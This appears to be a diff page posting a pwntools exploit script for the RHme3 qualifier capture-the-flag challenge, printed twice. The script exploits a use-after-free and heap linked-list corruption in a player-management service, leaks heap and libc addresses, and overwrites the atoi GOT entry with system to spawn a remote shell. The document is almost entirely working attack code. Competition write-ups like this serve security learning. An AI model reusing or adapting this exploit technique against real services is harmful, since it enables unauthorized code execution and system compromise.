volpino · August 29, 2017 07:04
diff --git a/rhme3_quals_exploit.py b/rhme3_quals_exploit.py
 from pwn import *

 #r = remote('127.0.0.1', 1337)
 atoi_system_offset = 58640
 r = remote('pwn.rhme.riscure.com', 1337)

 # Create player 0
 r.recvuntil("Your choice:")
 r.send("1\n")
 r.send("A" * 0 + "\n")
 r.send("1\n")
 r.send("2\n")
 r.send("3\n")
 r.send("4\n")
 r.recvuntil("Your choice:")

 # Select and delete player 0
 r.send("3\n")
 r.send("0\n")
 r.recvuntil("Your choice:")
 r.send("2\n")
 r.send("0\n")
 r.recvuntil("Your choice:")

 # Leak heap address
 r.send("5\n")
 r.recvuntil("Name:")
 r.recvuntil(":")
 heap_leak = int(r.recvuntil("\n").split(',')[0])
 print "[+] Heap leak:", hex(heap_leak)

 r.recvuntil("Your choice:")

 # Edit name and linked list corruption
 r.send("4\n")
 r.recvuntil("Your choice:")
 r.send("1\n")
 r.recvuntil("name:")
 r.send(p64(heap_leak) + "\n")
 r.recvuntil("Your choice:")
 r.send("0\n")
 r.recvuntil("Your choice:")

 # Fake chunk
 r.send("1\n")
 r.send("A" * 0 + "\n")
 r.send("32\n")
 r.send("0\n")
 r.send("0\n")
 r.send("0\n")
 r.recvuntil("Your choice:")

 # This gets allocated where we control it.
 r.send("1\n")
 r.send("A" * 253 + "\n")
 r.send("0\n")
 r.send("0\n")
 r.send("0\n")
 r.send("0\n")
 r.recvuntil("Your choice:")

 r.send("4\n")
 r.recvuntil("Your choice:")
 r.send("1\n")
 r.recvuntil("name:")
 r.send("B" * 16 + p64(0x603110) + "\n")  # atoi GOT
 r.send("0\n")
 r.recvuntil("Your choice:")

 r.send("6\n")
 r.recvuntil("Player 1")
 r.recvuntil("Name:")
 leak = u64(r.recvuntil("\n").strip().ljust(8, '\x00'))
 print "[+] Libc leak:", hex(leak)
 r.recvuntil("Your choice:")

 # Select player 1 and do write-what-where
 r.send("3\n")
 r.send("1\n")
 r.recvuntil("Your choice:")
 r.send("4\n")
 r.recvuntil("Your choice:")
 r.send("1\n")
 r.recvuntil("name:")
 r.send(p64(leak + atoi_system_offset) + '\n')  # Overwrite GOT
 r.send("sh\n")
 print "[+] SHELL"
 r.interactive()
	from pwn import *

	#r = remote('127.0.0.1', 1337)
	atoi_system_offset = 58640
	r = remote('pwn.rhme.riscure.com', 1337)

	# Create player 0
	r.recvuntil("Your choice:")
	r.send("1\n")
	r.send("A" * 0 + "\n")
	r.send("1\n")
	r.send("2\n")
	r.send("3\n")
	r.send("4\n")
	r.recvuntil("Your choice:")

	# Select and delete player 0
	r.send("3\n")
	r.send("0\n")
	r.recvuntil("Your choice:")
	r.send("2\n")
	r.send("0\n")
	r.recvuntil("Your choice:")

	# Leak heap address
	r.send("5\n")
	r.recvuntil("Name:")
	r.recvuntil(":")
	heap_leak = int(r.recvuntil("\n").split(',')[0])
	print "[+] Heap leak:", hex(heap_leak)

	r.recvuntil("Your choice:")

	# Edit name and linked list corruption
	r.send("4\n")
	r.recvuntil("Your choice:")
	r.send("1\n")
	r.recvuntil("name:")
	r.send(p64(heap_leak) + "\n")
	r.recvuntil("Your choice:")
	r.send("0\n")
	r.recvuntil("Your choice:")

	# Fake chunk
	r.send("1\n")
	r.send("A" * 0 + "\n")
	r.send("32\n")
	r.send("0\n")
	r.send("0\n")
	r.send("0\n")
	r.recvuntil("Your choice:")

	# This gets allocated where we control it.
	r.send("1\n")
	r.send("A" * 253 + "\n")
	r.send("0\n")
	r.send("0\n")
	r.send("0\n")
	r.send("0\n")
	r.recvuntil("Your choice:")

	r.send("4\n")
	r.recvuntil("Your choice:")
	r.send("1\n")
	r.recvuntil("name:")
	r.send("B" * 16 + p64(0x603110) + "\n") # atoi GOT
	r.send("0\n")
	r.recvuntil("Your choice:")

	r.send("6\n")
	r.recvuntil("Player 1")
	r.recvuntil("Name:")
	leak = u64(r.recvuntil("\n").strip().ljust(8, '\x00'))
	print "[+] Libc leak:", hex(leak)
	r.recvuntil("Your choice:")

	# Select player 1 and do write-what-where
	r.send("3\n")
	r.send("1\n")
	r.recvuntil("Your choice:")
	r.send("4\n")
	r.recvuntil("Your choice:")
	r.send("1\n")
	r.recvuntil("name:")
	r.send(p64(leak + atoi_system_offset) + '\n') # Overwrite GOT
	r.send("sh\n")
	print "[+] SHELL"
	r.interactive()